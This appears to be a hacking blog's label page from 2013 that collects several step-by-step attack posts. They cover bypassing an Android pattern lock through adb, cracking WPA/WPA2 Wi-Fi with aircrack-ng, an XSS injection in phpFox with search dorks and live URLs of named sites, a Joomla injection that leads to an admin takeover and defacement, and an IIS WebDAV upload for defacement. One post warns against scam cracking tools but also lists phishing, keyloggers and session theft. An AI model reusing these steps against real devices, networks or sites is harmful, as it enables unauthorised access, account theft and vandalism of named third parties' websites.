Showing posts with label Hacking Tools. Show all posts
Showing posts with label Hacking Tools. Show all posts

Saturday, December 7, 2013

Hack To Change Your IP Address Using CMD

BY Unknown IN , No comments


**Hack To Change Your IP Address**
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "cmd" and hit ok You should now be at an
MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places"
on your desktop.
7. Click on "properties You should now be on a screen
with something titled "Local Area Connection", or
something close to that, and, if you have a network
hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click
"properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from
the list under the "General" tab
10. Click on "Use the following IP address" under the
"General" tab 11. Create an IP address (It doesn't matter
what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the
"Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection"
screen.
15. Right-click back on "Local Area Connection" and go to
properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address With a little practice,
you can easily get this process down to 15 seconds.

Wednesday, December 4, 2013

How To Bypass Android Pattern Unlock

BY Unknown IN , , No comments


How to bypass android pattern unlock [3 STEPS!]

Requirements :

Linux distro
Android phone
USB cable
ADB

Step 1.
1.Connect your phone to your PC using USB cable.

Step 2. - Installing ADB over terminal
1.Boot into any Linux distro you have.
2.Open up terminal and type :

Quote:sudo apt-get install android-tools-adb

This will install ADB.

Step 3. - Disabling pattern unlock over terminal
1.Open up terminal again and type :

Quote:adb devices
adb shell
cd data/system
su
rm *.key

Now,disconnect your phone and reboot.Unlock pattern should be here.Just try some random gesture and it will unlock.

How To Hack Wi-Fi WPA/WPA2 Password Video Tutorial

BY Unknown IN , No comments


How To Hack Wi-Fi WPA/WPA2 Password With Video Tutorial

***********************************
Hello everybody, this is today i'm gonna show you how to hack any wi-fi passwords using backtrack 5

What We Need to hack Wi-fi Password?

1)Backtrack 5 [ R1 or R2]

2)Compatable Wi-fi Card

So Let's Start... 1st open Terminal and Then Follow My Steps :

1)In Terminal type : airmon-ng there we can see interfaces

2)Then type :airmon-ng start wlan0 It must found proceses

3)then we type : airodump-ng mon0 it will start scanning wi-fi networks

4)copy bssid and tpye : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

5)type : aireplay-ng -0 5 -a (bssid) mon0

6)click on places home folder drag in terminal wpa-01.cap in terminal and type : aircrack-ng (file Directory) or drag file in
terminal

7)type in terminal : aircrack-ng (filename)*.cap -w (dictionary location) And Hit Enter!

Success!

Video tutorial here ==> https://www.youtube.com/watch?v=aLi7V0-YNIo

Author :- Namit Behl

password now has been hacked.... so you can enter and enjoy with hacked wi-fi : ))

Saturday, October 19, 2013

The Reality Of Hacking Facebook, Orkut, Gmail, Yahoo Accounts

BY Unknown IN , , , No comments

This is a must read post for the beginners and newbies who have just started exploring hacking and for laymen who aren't interested in learning hacking but needs somebody's account password anyhow. I want you to aware about common misconceptions regarding Email/Social Networking Sites accounts hacking.


Otherwise those thoughts/misconceptions can seriously put you in trouble.
We usually start like googling this, "how to hack gmail" , "
softwares for hacking orkut","how to hack facebook" etc
 but unfortunately reach some malicious websites,
 follow stupid instructions and our own accounts get compromised.


Yes I wasn't any different and had been a foolish when I was a beginner


Okay talking in general ,
 suppose you just have signed up for an account(gmail,yahoo or any other reputed website)
Your password is stored only at two places


1. In website's database
2. In your mind
(Dont say a stupid thing that it is also saved in a text file on your
PC or in your girlfriend's mind etc)


Fetching your credentials (Id/password) from website's database is almost impossible.
They are paynig million of dollars for securing their systems.
Here I should remind you that, I am talking only about the reputed companies like microsoft,google,facebook etc.
 Hard Core hackers might get success in compromising their systems.


Now talking about your mind, its might be really very simple to do this. Shocked ?
At this ponit,
 I must say that hacking an email account depends strongly on carelessness/foolishness of victim.


FAQs or misconceptions regarding the same:-


Does any free/paid software/program/cracker exist to hack such accounts ?




No .You might get numberless free or preminum softwares which claim to crack email accounts.
The softwares just ask you to enter victim's email and start cracking/generating password.
I have already told you about two places where one's password is. From where the hell ,these softwares would bring passwords for you ? .
This kinda stuff is undoubtedly scam/rubbish.


Is there any free/premium online service to hack such accounts ?


No.You might have logged on to many websites that claim to crack any
email account for some amount of money.
They are completely fraud and be aware of them. Dont lose your money there !!



An Other type of fraudYou might have come across many tutorials/videos that instruct you
to compose an email to something@something.com.
You are asked to write victim's email ID, your
email ID, your password and are assured that you would get requested password within 24 hours.
Needless to say, it is an idea of befooling innocent people .
Ofcourse,your own account gets compromised.


Beleive me , you cant imagine the number of people who become victim of such rubbish things
 They
lose their money,time,accounts but get nothing in return. So take care.

How to hack these accounts ?

Every method directly/indirectly involve victim's carelessness/lack of knowledge.


Non-Technical-
While signing up for an account, we are asked to set a security question like our nickname,
birthday place etc so that we could recover our account in case we forget our password.
Many innocent people sets the correct asnwer which they are not supposed to do.
 Gather some information about victim and try to guess the answer of security question.


Technical-


1. Phishing- The most common way of hacking them is phishing. 
The common type of phishing is Fake Login Page.
The victim is anyhow anyway made to enter his credentials in fake login page which resembles the genuine login page and gets hacked. 
2.Malicious files- The victim is given a malicious file.
It could be binded with or hidden behind a genuine file.
 It is usually a keylogger or trojan.
A keylogger secretly records everything you type and sends to attacker.
Obviously records your passwords too. 
3.Stealing Sessions- Talking in simple language, whenever we sign into an account it generates a unique piece of string.
One copy is saved on server and other in our browser as cookie.
Both are matched everytime we do anything in our account.
This piece of string or login session is destroyed when we click on 'Sign Out' option.
An attacker can steal that session by convincing victim to run a piece of code in browser.
 Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out' ,
session gets destroyed and attacker too also gets signed out.


Note-You might be thinking that one could sniff the credentials sitting in same network. 
 But I should remind you that, 
they would be encrypted ones and cracking the SSL encryption is almost impossible.


Conclusion-


Sign up for an account at gmail/yahoo/facebook/orkut/hotmail.Now forget its password and recovery options
Never login into it . Can anyhow the password be cracked/hacked.?? Answer is big NO. 

phpFox (ajax.php) XSS Vulnerability

BY Unknown IN , , , 1 comment

PhpFox is a Php Script For Making Social Networking website, Similiar to Facebook.
3.1 and some other versions of PhpFox are vulnerable For XSS.cats.jpg (449�581)

Google Dork :
"intext:� � English (US) Powered By phpFox Version 3.0.1."
 "inurl:/static/ajax.php?core"


Open any website for search results with text :� � English (US) Powered By phpFox Version 3.0.1
or url xyz.com/static/ajax.php?core
now You'll Get something Like This URL give below
http://www.devilscafe.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">some message here&core[security_token]=99d754d2b583565369e194e30eaabcbc

Now Chnage the Text &Message= blah blah blah....  (you have to replace the red text with your html Tags)
for example

http://www.devilscafe.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
<center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><imgsrc="http://i55.tinypic.com/14uuv14.png"/>
&core[security_token]=99d754d2b583565369e194e30eaabcbc

You can use multiple html Tags, and scripts here For details Check This Post 

Live examples : 
http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>&core[security_token]=99d754d2b583565369e194e30eaabcbc
http://www.marshable.net/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message= <center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20<center><font%20color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a%20href='http://www.devilscafe.in'><img%20src="http://i55.tinypic.com/14uuv14.png"/>
http://mstudio84.com/gist/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://parsdb.ir/accessories/social_network/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://sohiran.ir/fb/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E

How To Hack Joomla Complete Tutorial Step by Step

BY Unknown IN , , No comments

1-  Finding Exploit And Target

Google dork: inurl:"option=com_mytube"

Type that Dork in Google.



2- Inject Target


Find a url like this:

http://site.com/index.php?option=com_mytube&Itemid=88..
Now replace the url like this:

Click here to view: http://pastebin.com/ZxxU8Nsr

If the site is vulnerable, you can see something like this:



We can see username, email and activation code. (username:email:activation code)

Now, let this page open and open a new page.

3- Admin password reset


Go to:

http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request



Type the email adress found in step 2 and press Submit.

The activation code should be resetted.

Return to the first page, refresh the page and take the new activation code.

Paste him in the token and press Submit.

problem with token.. :((

UPDATE: Joomla! 1.5.16 now hashes the reset token

if you see a thing like :$1$14411: after the activation code, it will not work



4- Admin Login

If you done everything ok, your Password page will load. Enter your new password...



After that go to:

http://www.site.com/administrator/


Standard Joomla portal content management system

Enter the username (found in step 2) and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

How to Hack IIS Exploit websites : The Most Easiest way of Website Hacking

BY Unknown IN , , No comments


In Internet Information Server Exploit website  we can upload the Defaced page on the Vulnerable Server without any User Name or Password. It is most Easiest way to Website Hacking



STEP 1:
 Click on Start button and open "RUN".
STEP 2: Now Type this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Now A Folder named "Web Folders" will open.


STEP 3:
 Now "Right-Click" in the folder and Goto "New" and then "Web Folder". 


STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".

STEP 5: Now Click on "Finish"
STEP 6: Now the folder will appear. You can open it and put any deface page or anything.
STEP 7: I put text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.
.
Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"
In your case it will be " www.[sitename].com/[file name that you uploaded] "

Some IIS Exploit Websites For Practise 

http://pastebin.com/NZHwmUy5